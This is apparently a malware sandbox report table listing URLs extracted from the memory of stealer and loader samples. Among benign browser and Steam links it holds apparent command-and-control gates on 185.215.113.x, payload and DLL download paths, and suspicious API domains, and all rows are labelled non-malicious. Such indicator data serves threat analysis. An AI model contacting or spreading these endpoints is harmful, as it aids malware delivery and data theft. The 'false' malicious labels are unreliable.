URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.206/	f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785879104.000000000123B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3102164882.0000000003981000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://goalyfeastz.site/apila=q	GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.php	f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.ytimg.com;	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.zhongyicts.com.cn	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://goalyfeastz.site/apiU-	shop.exe, 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3365556478.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://goalyfeastz.site/	shop.exe, 00000032.00000003.3571302943.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575188417.000000000164B000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3573133874.000000000164A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318669001.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3385557240.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3132876164.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3361156674.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3172906832.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3137274134.000000000165E000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3577128165.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318239726.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3175294707.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3146895960.0000000003B20000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpCoinomi	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000000.2596749853.0000000000E79000.00000002.00000001.01000000.0000000E.sdmp, EcoCraft.scr, 0000001C.00000000.2676298828.00000000007E9000.00000002.00000001.01000000.00000011.sdmp, EcoCraft.scr, 00000020.00000002.2778743195.00000000007E9000.00000002.00000001.01000000.00000011.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://goalyfeastz.site/apiDk	GOLD1234.exe, 00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3127124077.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3126824181.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3226982086.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3147801023.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2993220330.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3156872332.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3157231448.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3284579257.000000000165F000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318306833.0000000001669000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575346038.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3570754221.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3396975066.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3178681399.000000000165E000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3313436090.000000000165F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17iR	stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded5	axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ace-snapper-privately.ngrok-free.app/test/testFailed	Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs12	Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://goalyfeastz.site/rpwls	shop.exe, 00000032.00000003.3160434239.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3161659780.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com/	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.carterandcone.coml	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ep	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php3	stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php7	stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php)	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou:443/apiwWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-	new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/recaptcha/	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/mine/random.exep	new_v8.exe, 0000001B.00000003.3586627682.0000000001238000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3586761744.0000000001241000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpA	stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/yR	stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exe	new_v8.exe, new_v8.exe, 0000001B.00000003.3586809787.000000000123A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3586627682.0000000001238000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3489672229.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	new_v8.exe, 0000001B.00000003.2729694255.00000000039A5000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3098799656.0000000003B44000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou/pI	new_v8.exe, 0000001B.00000003.2804141187.0000000003978000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804564424.0000000003978000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php=	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://html4/loose.dtd	Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://steamcommunity.com/-	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpU	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.founder.com.cn/cn/bThe	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.rs/getrandom#nodejs-es-module-support	f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou/((	new_v8.exe, 0000001B.00000003.2732256893.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2732759831.000000000123B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://goalyfeastz.site/apilaZq	GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://.css	Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://recaptcha.net/recaptcha/;	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpZ	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dlla	stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.typography.netD	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpq	stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://broadcast.st.dl.eccdnx.com	new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou/apihZP	new_v8.exe, 0000001B.00000003.3051791237.0000000003986000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou/s	new_v8.exe, 0000001B.00000003.3013166216.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912344103.0000000001234000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou/api	new_v8.exe, 0000001B.00000003.3051791237.0000000003986000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804806549.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912107738.0000000001267000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912344103.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3585890980.0000000003986000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3049757259.0000000001267000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912258369.000000000123C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou/m	new_v8.exe, 0000001B.00000003.2780397423.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2754940849.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2780481802.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2753208386.0000000001234000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
